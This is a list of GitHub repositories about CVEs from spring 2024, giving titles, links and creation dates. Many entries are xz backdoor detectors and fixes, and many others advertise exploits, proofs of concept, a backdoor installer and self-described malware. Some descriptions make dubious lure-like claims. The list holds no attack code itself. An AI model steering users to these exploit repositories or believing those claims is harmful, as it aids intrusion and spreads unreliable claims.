**OS Command Injection Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30665](https://github.com/yashpatelphd/CVE-2024-30665) create time: 2024-04-05T05:45:12Z

**Security Misconfiguration in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30663](https://github.com/yashpatelphd/CVE-2024-30663) create time: 2024-04-05T05:39:58Z

**Information Leakage in ROS Melodic Morenia via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-30662](https://github.com/yashpatelphd/CVE-2024-30662) create time: 2024-04-05T05:36:29Z

**Unauthorized Information Access Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30661](https://github.com/yashpatelphd/CVE-2024-30661) create time: 2024-04-05T05:32:35Z

**Shell Injection Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30659](https://github.com/yashpatelphd/CVE-2024-30659) create time: 2024-04-05T05:23:02Z

**Denial-of-Service (DoS) Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30658](https://github.com/yashpatelphd/CVE-2024-30658) create time: 2024-04-05T05:17:00Z

**Unauthorized Node Injection Vulnerability in ROS Melodic Morenia** : [yashpatelphd/CVE-2024-30657](https://github.com/yashpatelphd/CVE-2024-30657) create time: 2024-04-05T05:07:42Z

**An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.** : [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor) create time: 2024-04-05T01:44:26Z

**Jasmin ransomware web panel path traversal PoC** : [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc) create time: 2024-04-04T22:59:55Z

**Mass scanner , and single for CVE-2018-16431** : [RHYru9/CVE-2018-16431](https://github.com/RHYru9/CVE-2018-16431) create time: 2024-04-04T19:31:57Z

**CVE-2024-31380 Soflyy Oxygen Builder RCE** : [Chokopik/CVE-2024-31380-POC](https://github.com/Chokopik/CVE-2024-31380-POC) create time: 2024-04-04T19:42:47Z

**CVE-2024-27191 POC Inpersttion Slivery Extender RCE** : [somecodeinjection/CVE-2024-27191-POC](https://github.com/somecodeinjection/CVE-2024-27191-POC) create time: 2024-04-04T19:30:20Z

**A small repo with a single playbook.** : [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094) create time: 2024-04-04T14:52:09Z

**An Ansible playbook to check and remediate CVE-2024-3094 (XZ Backdoor)** : [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094) create time: 2024-04-04T13:31:20Z

**CVE-2024-27474, CVE-2024-27476, CVE-2024-27477** : [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC) create time: 2024-04-04T13:58:33Z

**Wondershare Filmora v.13.0.51 - Insecure Permissions Privilege Escalation** : [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574) create time: 2024-04-04T13:44:08Z

**Scans liblzma from xu-utils for backdoor (CVE-2024-3094)** : [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan) create time: 2024-04-04T11:29:41Z

**POC CVE-2024-2879 Exploit ----> RCE** : [JohnNetSouldRU/CVE-2024-2879-POC](https://github.com/JohnNetSouldRU/CVE-2024-2879-POC) create time: 2024-04-04T08:43:39Z

**no description** : [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094) create time: 2024-04-04T06:40:56Z

**no description** : [paras98/CVE-2021-38297-Go-wasm-Replication](https://github.com/paras98/CVE-2021-38297-Go-wasm-Replication) create time: 2024-04-04T01:17:05Z

**CVE-2023-33466 (Windows)** : [v3gahax/CVE-2023-33466](https://github.com/v3gahax/CVE-2023-33466) create time: 2024-04-03T22:26:02Z

**The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ/LZMA utilities. It checks XZ versions, SSHD's LZMA linkage, and scans for specific byte patterns, delivering results in a concise table format.** : [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker) create time: 2024-04-03T22:19:50Z

**The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-2024-3094.** : [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker) create time: 2024-04-03T19:10:43Z

**Authenticated Remote Code Execution in in VTiger Open Source CRM v7.5** : [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304) create time: 2024-04-03T17:57:23Z

**CVE-2024-26198 POC RCE Microsoft Exchange Server** : [babywalkerenc/CVE-2024-26198-POC](https://github.com/babywalkerenc/CVE-2024-26198-POC) create time: 2024-04-03T16:57:49Z

**no description** : [lore-is-already-taken/multicheck_CVE-2024-21762](https://github.com/lore-is-already-taken/multicheck_CVE-2024-21762) create time: 2024-04-03T16:26:02Z

**Local Privilege Escalation Vulnerability on Axigen for Windows** : [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589) create time: 2024-04-03T15:31:02Z

**Macro Expert <= 4.9.4 - Insecure Permissions Privilege Escalation** : [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674) create time: 2024-04-03T15:16:09Z

**ASUS Control Center Express =< 01.06.15 - Unquoted Service Path** : [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673) create time: 2024-04-03T14:47:20Z

**SUPERAntiSpyware Professional X <=10.0.1264 LPE Vulnerability PoC** : [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518) create time: 2024-04-03T13:41:18Z

**Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor** : [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check) create time: 2024-04-03T13:09:32Z

**no description** : [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086) create time: 2024-04-03T13:09:22Z

**POC** : [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626) create time: 2024-04-03T11:45:19Z

**This is an container environment running CVE-2024-3094 sshd backdoor instance, working with https://github.com/amlweems/xzbot project. IT IS NOT Docker, just implemented by chroot.** : [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container) create time: 2024-04-03T10:50:47Z

**LAB: TẤN CÔNG HỆ ĐIỀU HÀNH WINDOWS DỰA VÀO LỖ HỔNG GIAO THỨC SMB.** : [ducanh2oo3/Vulnerability-Research-CVE-2017-0144](https://github.com/ducanh2oo3/Vulnerability-Research-CVE-2017-0144) create time: 2024-04-03T07:39:43Z

**Collection of Detection, Fix, and exploit for CVE-2024-3094** : [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits) create time: 2024-04-03T07:51:49Z

**no description** : [uthrasri/CVE-2023-40133](https://github.com/uthrasri/CVE-2023-40133) create time: 2024-04-03T07:07:54Z

**no description** : [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137) create time: 2024-04-03T06:44:22Z

**CSV Injection in Addactis IBNRS 3.10.3.107** : [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375) create time: 2024-03-11T16:32:41Z

**no description** : [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564) create time: 2024-04-03T01:45:18Z

**CVE-2024-29269** : [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269) create time: 2024-04-03T02:02:27Z

**Our current information about the CVE-2024-3094 backdoor.** : [CyberGuard-Foundation/CVE-2024-3094](https://github.com/CyberGuard-Foundation/CVE-2024-3094) create time: 2024-04-02T23:10:06Z

**CVE-2023-20198** : [sh7729ye/CVE-2023-20198](https://github.com/sh7729ye/CVE-2023-20198) create time: 2024-04-02T20:46:45Z

**apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links** : [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links) create time: 2024-04-02T20:17:07Z

**Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094** : [r0binak/xzk8s](https://github.com/r0binak/xzk8s) create time: 2024-04-02T20:07:14Z

**no description** : [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723) create time: 2024-03-20T01:28:09Z

**Just for fun** : [St0rm-85/CVE-2023-42793](https://github.com/St0rm-85/CVE-2023-42793) create time: 2024-04-02T16:54:03Z

**no description** : [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643) create time: 2024-03-31T16:55:17Z

**no description** : [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645) create time: 2024-03-31T16:52:48Z

**no description** : [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644) create time: 2024-03-31T16:50:25Z

**no description** : [YangHyperData/LOGJ4_PocShell_CVE-2021-44228](https://github.com/YangHyperData/LOGJ4_PocShell_CVE-2021-44228) create time: 2024-04-02T14:44:10Z

**CVE-2019-0708 Exploit With 100% Success Ratio** : [jdouglas12a/CVE-2019-0708](https://github.com/jdouglas12a/CVE-2019-0708) create time: 2024-04-02T13:12:21Z

**no description** : [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172) create time: 2024-04-02T11:53:54Z

**Em fevereiro de 2024, foi identificado duas novas vulnerabilidades que afetam o servidor JetBrains TeamCity (CVE-2024-27198 e CVE-2024-27199)** : [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-) create time: 2024-04-02T09:46:51Z

**This Repository Includes Kubernetes manifest files for configuration of Honeypot system and Falco IDS in K8s environment. There are also Demo Application written with Node.js which is containing Remote Code Execution Vulnerability (CVE-2023-32314) for demonstrating all addvantages of this architecture to manage Honeypot systems** : [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure) create time: 2024-04-02T08:32:05Z

**CVE-2024-3094 - Checker (fix for arch etc)** : [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094) create time: 2024-04-02T08:55:50Z

**Check xz vulnerability (cve_2024_3094) on your system.** : [robertdebock/ansible-role-cve_2024_3094](https://github.com/robertdebock/ansible-role-cve_2024_3094) create time: 2024-04-02T08:31:40Z

**no description** : [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708) create time: 2024-04-02T04:58:38Z

**Detectar CVE-2024-3094** : [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094) create time: 2024-04-02T03:36:07Z

**CVE-2024-3094 XZ Backdoor Detector** : [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector) create time: 2024-04-02T01:56:29Z

**Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.** : [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils) create time: 2024-04-02T01:22:04Z

**CVE-2022-24818: Java Deserialization via Unchecked JNDI Lookups in GeoServer and GeoTools** : [mbadanoiu/CVE-2022-24818](https://github.com/mbadanoiu/CVE-2022-24818) create time: 2024-04-01T13:06:31Z

**no description** : [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094) create time: 2024-04-01T16:42:47Z

**no description** : [zunak/CVE-2024-22642](https://github.com/zunak/CVE-2024-22642) create time: 2024-04-01T16:22:03Z

**This is my malware** : [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC) create time: 2024-04-01T15:59:34Z

**no description** : [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641) create time: 2024-04-01T16:11:28Z

**XZ Backdoor Extract** : [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094) create time: 2024-04-01T16:08:50Z

**no description** : [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640) create time: 2024-04-01T15:43:07Z

**no description** : [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094) create time: 2024-04-01T15:36:58Z

**Checker - CVE-2024-3094** : [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094) create time: 2024-04-01T15:15:16Z

**notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)** : [amlweems/xzbot](https://github.com/amlweems/xzbot) create time: 2024-04-01T14:28:09Z

**Proof of Concept for CVE-2018-10933** : [HSw109/CVE-2018-10933-PoC](https://github.com/HSw109/CVE-2018-10933-PoC) create time: 2024-04-01T13:47:26Z

**Obsidian notes about CVE-2024-3094** : [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094) create time: 2024-04-01T12:41:00Z

**CVE-2024-3094** : [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability) create time: 2024-04-01T09:09:54Z

**no description** : [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094) create time: 2024-04-01T09:06:25Z

**no description** : [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info) create time: 2024-04-01T09:05:47Z

**Exploit for CVE-2024-20767 affecting Adobe ColdFusion** : [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion) create time: 2024-04-01T09:01:30Z

**no description** : [hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705) create time: 2024-04-01T07:33:10Z

**no description** : [zgimszhd61/cve-2024-3094-detect-tool](https://github.com/zgimszhd61/cve-2024-3094-detect-tool) create time: 2024-04-01T04:28:24Z

**no description** : [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233) create time: 2024-04-01T01:20:21Z

**no description** : [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect) create time: 2024-04-01T02:25:33Z

**XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)** : [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094) create time: 2024-04-01T01:56:08Z

**no description** : [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094) create time: 2024-03-31T18:46:58Z

**no description** : [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script) create time: 2024-03-31T17:53:11Z

**This repository provides an exploit for CVE-2024-28247, highlighting a vulnerability that permits a remote attacker to read arbitrary files on the system.** : [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read) create time: 2024-03-31T15:25:15Z

**Ansible playbook for patching CVE-2024-3094** : [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher) create time: 2024-03-31T14:09:28Z

**upgraded of BlueBourne CVE-2017-0785 to python3** : [MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-](https://github.com/MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-) create time: 2024-03-31T12:22:11Z

**no description** : [krascovict/OSINT---CVE-2024-3094-](https://github.com/krascovict/OSINT---CVE-2024-3094-) create time: 2024-03-31T12:21:34Z

**no description** : [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools) create time: 2024-03-31T10:46:33Z

**A script to detect if xz is vulnerable - CVE-2024-3094** : [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094) create time: 2024-03-31T10:45:44Z

**no description** : [k4t3pr0/Check-CVE-2024-3094](https://github.com/k4t3pr0/Check-CVE-2024-3094) create time: 2024-03-31T08:14:41Z

**no description** : [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094) create time: 2024-03-31T04:50:09Z

**TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability** : [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482) create time: 2024-03-31T02:04:34Z

**no description** : [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner) create time: 2024-03-30T23:16:10Z

**no description** : [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker) create time: 2024-03-30T21:56:17Z

**An ssh honeypot with the XZ backdoor. CVE-2024-3094** : [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot) create time: 2024-03-30T22:07:24Z

**no description** : [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094) create time: 2024-03-30T20:05:13Z

**This project contains a shell script designed to help users identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 and 5.6.1 of xz-utils are known to be vulnerable, and this script aids in detecting them and optionally downgrading to a stable, un-compromised version (5.4.6).** : [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer) create time: 2024-03-30T19:23:30Z

**Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code.** : [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker) create time: 2024-03-30T16:25:50Z

**K8S and Docker Vulnerability Check for CVE-2024-3094** : [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094) create time: 2024-03-30T17:35:49Z

**打HTB的机器时候碰到的cve,exploit-db的exp有些错误于是给出手工利用方式以及exp** : [UserB1ank/CVE-2021-31630](https://github.com/UserB1ank/CVE-2021-31630) create time: 2024-03-30T15:30:33Z

**no description** : [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094) create time: 2024-03-30T15:29:05Z

**Poc for CVE 2023 5044** : [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044) create time: 2024-03-29T18:53:50Z

**More specific : Dirty COW (CVE-2016-5195)** : [sakilahamed/Linux-Kernel-Exploit-LAB](https://github.com/sakilahamed/Linux-Kernel-Exploit-LAB) create time: 2024-03-30T13:15:08Z

**no description** : [bsekercioglu/cve2024-3094-Checker](https://github.com/bsekercioglu/cve2024-3094-Checker) create time: 2024-03-30T11:49:27Z

**SyncBreeze exploit for CVE-2017-9757** : [peterleiva/CVE-2017-9757](https://github.com/peterleiva/CVE-2017-9757) create time: 2024-03-30T02:06:15Z

**xz exploit to privilege escalation in Linux** : [Jooose001/CVE-2024-3094-EXPLOIT](https://github.com/Jooose001/CVE-2024-3094-EXPLOIT) create time: 2024-03-30T10:53:59Z

**History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.** : [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github) create time: 2024-03-30T10:48:54Z

**The Integrate Google Drive unauthorized access of data** : [MrCyberSecs/CVE-2024-2086-GOOGLE-DRIVE](https://github.com/MrCyberSecs/CVE-2024-2086-GOOGLE-DRIVE) create time: 2024-03-30T07:45:18Z

**no description** : [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check) create time: 2024-03-30T07:38:39Z

**RCE exploit for Microsoft SharePoint 2019** : [AndreOve/CVE-2023-24955-real-RCE](https://github.com/AndreOve/CVE-2023-24955-real-RCE) create time: 2024-03-30T06:26:48Z

**WallEscape vulnerability in util-linux** : [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085) create time: 2024-03-11T00:15:03Z

**no description** : [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc) create time: 2024-03-30T01:00:31Z

**no description** : [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094) create time: 2024-03-29T23:36:07Z

**This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of the "xz" utility, as specified by CVE-2024-3094.** : [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check) create time: 2024-03-29T23:21:44Z

**Script to detect CVE-2024-3094.** : [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection) create time: 2024-03-29T23:20:22Z

**no description** : [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094) create time: 2024-03-29T21:41:42Z

**Verify that your XZ Utils version is not vulnerable to CVE-2024-3094** : [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker) create time: 2024-03-29T20:52:27Z

**Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)** : [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker) create time: 2024-03-29T20:28:17Z

**Project Program sederhana hasil belajar python, untuk mendeteksi CVE 2017 – 16894 (remote attackers can obtain sensitive information)** : [ibnurusdianto/.env-cve2017](https://github.com/ibnurusdianto/.env-cve2017) create time: 2024-03-29T18:58:33Z

**Information for CVE-2024-3094** : [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info) create time: 2024-03-29T17:03:01Z

**CVE-2024-27619** : [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos) create time: 2024-02-24T19:21:00Z

**LPE exploit for CVE-2024-0582 (io_uring)** : [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582) create time: 2024-03-29T14:45:22Z

**CVE-2023-35078 Remote Unauthenticated API Access vulnerability has been discovered in Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core.** : [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078) create time: 2024-03-29T14:15:49Z

**ShadowRay RCE POC (CVE-2023-48022)** : [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022) create time: 2024-03-29T09:54:31Z

**Use CVE-2024-29278** : [QDming/cve](https://github.com/QDming/cve) create time: 2024-03-29T08:20:23Z

**Details of CVE-2024-31033** : [2308652512/JJWT_BUG](https://github.com/2308652512/JJWT_BUG) create time: 2024-03-29T04:44:51Z

**This is an exploit script to find out wordpress admin's username and password hash by exploiting CVE-2024-1698.** : [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit) create time: 2024-03-29T04:11:06Z

**Vulnerability verification** : [no3586/CVE-2024-31025](https://github.com/no3586/CVE-2024-31025) create time: 2024-03-28T23:50:30Z

**Python script for exploiting command injection in Open PLC Webserver v3** : [thewhiteh4t/cve-2021-31630](https://github.com/thewhiteh4t/cve-2021-31630) create time: 2024-03-28T21:31:45Z

**ecrit un script python de correction de la vulnérabilités windows 7 pour réponse automatique de wazuh: CVE-2017-0143 (MS17-010 - EternalBlue) CVE-2019-0708 (BlueKeep), CVE-2019-1181 / CVE-2019-1182 (BlueKeep II), CVE-2015-1701 (MS15-034), CVE-2010-3333 (MS10-092), CVE-2012-0003 (MS12-020), CVE-2017-8759, CVE-2014-4114** : [chefphenix25/vuln-rabilit-windows7](https://github.com/chefphenix25/vuln-rabilit-windows7) create time: 2024-03-28T21:38:08Z

**Bludit 3.9.2 auth bruteforce bypass** : [mind2hex/CVE-2019-17240](https://github.com/mind2hex/CVE-2019-17240) create time: 2024-03-28T19:42:54Z

**Bludit 3.9.2 Remote Command Execution (RCE)** : [mind2hex/CVE-2019-16113](https://github.com/mind2hex/CVE-2019-16113) create time: 2024-03-28T19:37:24Z

**no description** : [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169) create time: 2024-03-28T19:23:56Z

**Windows LPE** : [ldpreload/CVE-2024-26169](https://github.com/ldpreload/CVE-2024-26169) create time: 2024-03-28T13:14:12Z

**A working POC found while doing a HTB challenge. Original: https://github.com/user0x1337/CVE-2022-39227** : [NoSpaceAvailable/CVE-2022-39227](https://github.com/NoSpaceAvailable/CVE-2022-39227) create time: 2024-03-28T12:55:13Z

**no description** : [dev-test-gg/private_repository_gg__2024-03-28T10-36-15_jDvCve](https://github.com/dev-test-gg/private_repository_gg__2024-03-28T10-36-15_jDvCve) create time: 2024-03-28T10:36:16Z

**This Python script exploits a vulnerability (CVE-2024-21388) in Microsoft Edge, allowing silent installation of browser extensions with elevated privileges via a private API.** : [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388) create time: 2024-03-28T09:31:31Z

**Check CVE-2023-42789** : [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789) create time: 2024-03-28T08:59:12Z

**no description** : [huyqa/cve-2024-20767](https://github.com/huyqa/cve-2024-20767) create time: 2024-03-28T07:46:31Z

**no description** : [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193) create time: 2024-03-28T07:30:04Z

**no description** : [ticofookfook/CVE-2021-43798](https://github.com/ticofookfook/CVE-2021-43798) create time: 2024-03-27T21:47:06Z

**The only one working RCE exploit that sells for $1,000 on the darknet** : [MrCyberSec/CVE-2024-21762-Fortinet-RCE-ALLWORK](https://github.com/MrCyberSec/CVE-2024-21762-Fortinet-RCE-ALLWORK) create time: 2024-03-27T19:29:00Z

**Critical RCE CVE-2024-21899 Vulnerability in QNAP Products** : [Oxdestiny/CVE-2024-21899-RCE-POC](https://github.com/Oxdestiny/CVE-2024-21899-RCE-POC) create time: 2024-03-27T19:19:49Z

**FBI hacked Lockbit use this exploit.** : [NewLockBit/CVE-2023-3824-PHP-to-RCE](https://github.com/NewLockBit/CVE-2023-3824-PHP-to-RCE) create time: 2024-03-27T18:59:40Z

**Execute arbitrary code on the victim’s device, compromising data security and system integrity in Chrome 120.0.6099** : [Oxdestiny/CVE-2024-0519-Chrome-exploit](https://github.com/Oxdestiny/CVE-2024-0519-Chrome-exploit) create time: 2024-03-27T19:10:45Z

**no description** : [at4111/CVE_2022_35869](https://github.com/at4111/CVE_2022_35869) create time: 2024-03-27T16:04:26Z

**This for research purposes only** : [donami95/CVE-2018-6574](https://github.com/donami95/CVE-2018-6574) create time: 2024-03-27T15:13:35Z

**no description** : [RenukaSelvar/system_bt_aosp10_cve-2022-20140](https://github.com/RenukaSelvar/system_bt_aosp10_cve-2022-20140) create time: 2024-03-27T10:45:21Z

**no description** : [adminquit/CVE-2024-28288](https://github.com/adminquit/CVE-2024-28288) create time: 2024-03-27T03:00:56Z

**CVE-2024-21762-POC replayse published** : [S0SkiPlosK1/CVE-2024-21762-POC](https://github.com/S0SkiPlosK1/CVE-2024-21762-POC) create time: 2024-03-26T20:11:52Z

**Exploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability** : [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767) create time: 2024-03-26T19:17:14Z

**Downloaded a packet capture (.pcapng) file from malware-traffic-analysis.net which was an example of an attempted attack against a webserver using the Log4J vulnerability (CVE-2021-44228). I examined teh amount of endpoints communicating with the server and knowing jnidi as a common in the vulnerbilty found it in clear text** : [KirkDJohnson/Wireshark](https://github.com/KirkDJohnson/Wireshark) create time: 2024-03-26T18:47:20Z

**no description** : [404fu/CVE-2022-26134-POC](https://github.com/404fu/CVE-2022-26134-POC) create time: 2024-03-26T14:18:17Z

**Proof Of Concept** : [itwizardo/CVE-2011-5325](https://github.com/itwizardo/CVE-2011-5325) create time: 2024-03-26T10:44:03Z

**The exploit targets a critical privilege escalation vulnerability in macOS versions Monterey, Ventura, and Sonoma.** : [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931) create time: 2024-03-26T11:01:54Z

**Proof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion** : [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767) create time: 2024-03-26T10:03:51Z

**no description** : [NMinhTrung/LIFERAY-CVE-2020-7961](https://github.com/NMinhTrung/LIFERAY-CVE-2020-7961) create time: 2024-03-26T07:55:54Z

**[CRITICAL] Mergen Software QMS Exploit SQL injection to RCE** : [RobertSecurity/CVE-2024-2865-CRITICAL-](https://github.com/RobertSecurity/CVE-2024-2865-CRITICAL-) create time: 2024-03-26T08:20:07Z

**Exploit for CVE-2024-20767 - Adobe ColdFusion** : [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767) create time: 2024-03-26T06:51:08Z

**no description** : [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054) create time: 2024-03-25T07:01:59Z

**no description** : [ph-hitachi/CVE-2023-46604](https://github.com/ph-hitachi/CVE-2023-46604) create time: 2024-03-25T23:32:26Z

**no description** : [ox1111/CVE-2022-32932](https://github.com/ox1111/CVE-2022-32932) create time: 2024-03-25T23:00:41Z

